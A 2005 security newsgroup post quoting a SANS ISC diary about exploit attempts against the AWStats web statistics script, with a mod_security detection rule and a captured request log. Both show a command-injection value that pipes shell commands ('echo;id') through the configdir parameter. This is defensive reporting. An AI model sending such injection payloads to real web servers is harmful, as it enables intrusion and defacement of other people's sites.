AWStats Exploits, Port 7162/TCP and 24212/TCP traffic, spamvertised site redirected to Al'Jazeera

AWStats Exploits, Port 7162/TCP and 24212/TCP traffic, spamvertised
site redirected to Al'Jazeera 
http://isc.sans.org/diary.php?date=2005-01-31 

***********************************************************
Quote
***********************************************************
AWStats Exploits

A couple days ago, an advisory (e.g. see Securiteam) detailed a
vulnerability in the popular web statistics package 'AWStats'. 

We got a note from Ryan Barnet earlier, who detected an exploit
attempt for this vulnerability. The traffic was flagged using
mod_security. 

The following mod_security rule was used to detect the attempt:

/awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|?confi
gdi r=|echo%20;echo%20;id;echo%20;echo|

Another reader reported an incident where this attack was succesful.
The attacker defaced the respective website by replacing various
'index' files. (index.htm, index.html, index.php). The web hosting
company attacked informed its clients. 

And the captured request data (I removed some lines that may reveal
too much about the attacked system): 

HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
 application/vnd.ms-powerpoint, application/vnd.ms-excel,
 application/msword, */* 
HTTP_ACCEPT_LANGUAGE = en-us
HTTP_HOST = www.foo.com
HTTP_MOD_SECURITY_ACTION = 403
HTTP_MOD_SECURITY_MESSAGE = Access denied with code 403. Pattern
match "\;id" at THE_REQUEST HTTP_USER_AGENT = Mozilla/4.0
(compatible; MSIE 6.0b; Windows NT 5.0) PATH = /usr/sbin:/usr/bin
QUERY_STRING = 
REDIRECT_QUERY_STRING =
configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%2
0;id; 
   echo%20;echo|
REDIRECT_REQUEST_METHOD = GET
REDIRECT_SCRIPT_URI =http://www.foo.com/awstats/awstats.pl
REDIRECT_SCRIPT_URL = /awstats/awstats.pl
REDIRECT_STATUS = 403
REDIRECT_URL = /awstats/awstats.pl
REDIRECT_mod_security_relevant = 1
REMOTE_ADDR = 200.203.166.61
REMOTE_PORT = 33165
REQUEST_METHOD = GET
REQUEST_URI =
/awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| 
     ?configdir=|echo%20;echo%20;id;echo%20;echo|
SCRIPT_NAME = /cgi-bin/403.cgi
SCRIPT_URI =http://www.foo.com/awstats/awstats.pl
SCRIPT_URL = /awstats/awstats.pl
SERVER_ADDR = 192.168.1.100
SERVER_ADMIN = webmaster@foo.com
SERVER_NAME = www.foo.com
SERVER_PORT = 80
SERVER_PROTOCOL = HTTP/1.0
SERVER_SIGNATURE = 
TZ = US/Eastern


[...]

http://isc.sans.org/diary.php?date=2005-01-31

***********************************************************
Unquote
***********************************************************

-- 
Kayode Okeyode
http://del.icio.us/kayodeok
http://www.kayodeok.co.uk/weblog/
0
kayodeok
1/31/2005 8:08:57 PM
📁 grc.security
📃 16608 articles.
⭐ 3 followers.

💬 0 Replies
👁️‍🗨️ 7393 Views

Reply: